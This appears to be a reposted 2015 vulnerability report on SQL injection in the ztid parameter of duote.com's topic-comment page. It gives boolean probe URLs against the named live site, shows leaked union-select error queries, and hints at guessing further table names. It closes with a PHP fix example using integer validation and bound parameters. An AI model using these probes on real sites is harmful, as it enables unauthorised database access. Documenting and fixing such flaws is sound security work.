Duote (多特) topic comments: SQL injection flaw and fix - Website Security

Source: 自学PHP网    Time: 2015-04-17 14:47

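Brief description: insufficient filtering leads to injection
Details: Haha, the site is too big; there are times when things get overlooked
Proof of vulnerability: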

http://www.duote.com/zhuanti/comment/index.php?ztid=44+AnD+1=1
http://www.duote.com/zhuanti/comment/index.php?ztid=44+AnD+1=2

SQL statements leaked in the error output:

1064You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'group by likes' at line 1
SQL= select count(*) as cnt,likes from tab_zt_comment where ztId=-44 union select 1,2,3,4 and published=1 group by likes

1064You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by vote desc limit 5' at line 1
SQL= select * from tab_zt_comment where ztId=-44 union select 1,2,3,4 and published=1 and vote>0 order by vote desc limit 5

1064You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by addTime desc limit 0,10' at line 1
SQL= select * from tab_zt_comment where ztId=-44 union select 1,2,3,4 and published=1 order by addTime desc limit 0,10

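Based on the leaked SQL statement, SQL= select * from tab_zt_comment where ztId=-44 union select 1,2,3,4 and published=1 order by addTime desc limit 0,10, we can penetrate further. The table naming, for example tab_zt_comment, follows the format tab_zt_, so other table names can be guessed from it.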


Fix:

Filter characters
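
A fix for the numeric ztid parameter, shown as an added example that is not code from the original report or from the site: the concatenated query beside a version that validates the value as an integer, binds it as a parameter, and keeps database errors out of the response. Assumptions: in-memory SQLite stands in for MySQL so the script runs offline, and the function names, the `content` column and the sample rows are constructed.

```php
<?php
// Added example. SQLite in memory stands in for the site's MySQL so the
// script runs offline; rows and the 'content' column are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tab_zt_comment (ztId INTEGER, content TEXT,
           published INTEGER, vote INTEGER, addTime INTEGER)');
$db->exec("INSERT INTO tab_zt_comment VALUES (44,'first',1,3,100),
           (44,'second',1,0,200), (45,'other topic',1,1,300)");

// Before: the parameter is pasted into the SQL text, so "44 AnD 1=2"
// becomes part of the WHERE clause (the behaviour the report shows).
function comments_vulnerable(PDO $db, string $ztid): array {
    $sql = "select * from tab_zt_comment where ztId=$ztid and published=1"
         . " order by addTime desc limit 0,10";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// After: accept only a positive integer, then bind it as a parameter so
// the value can never change the statement's structure.
function comments_hardened(PDO $db, string $ztid): array {
    $id = filter_var($ztid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('invalid ztid');
    }
    $st = $db->prepare('select * from tab_zt_comment where ztId = :id'
        . ' and published = 1 order by addTime desc limit 0,10');
    $st->bindValue(':id', $id, PDO::PARAM_INT);
    $st->execute();
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal id and the two probes from the report
// (the '+' in the URL decodes to a space).
foreach (['44', '44 AnD 1=1', '44 AnD 1=2'] as $ztid) {
    $before = count(comments_vulnerable($db, $ztid));
    try {
        $after = count(comments_hardened($db, $ztid)) . ' rows';
    } catch (InvalidArgumentException $e) {
        $after = 'rejected';              // answer with a generic 400 page
    } catch (PDOException $e) {
        error_log($e->getMessage());      // details go to the server log only
        $after = 'error';                 // never echo the SQL to the client
    }
    printf("%-12s before: %d rows, after: %s\n", $ztid, $before, $after);
}
```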
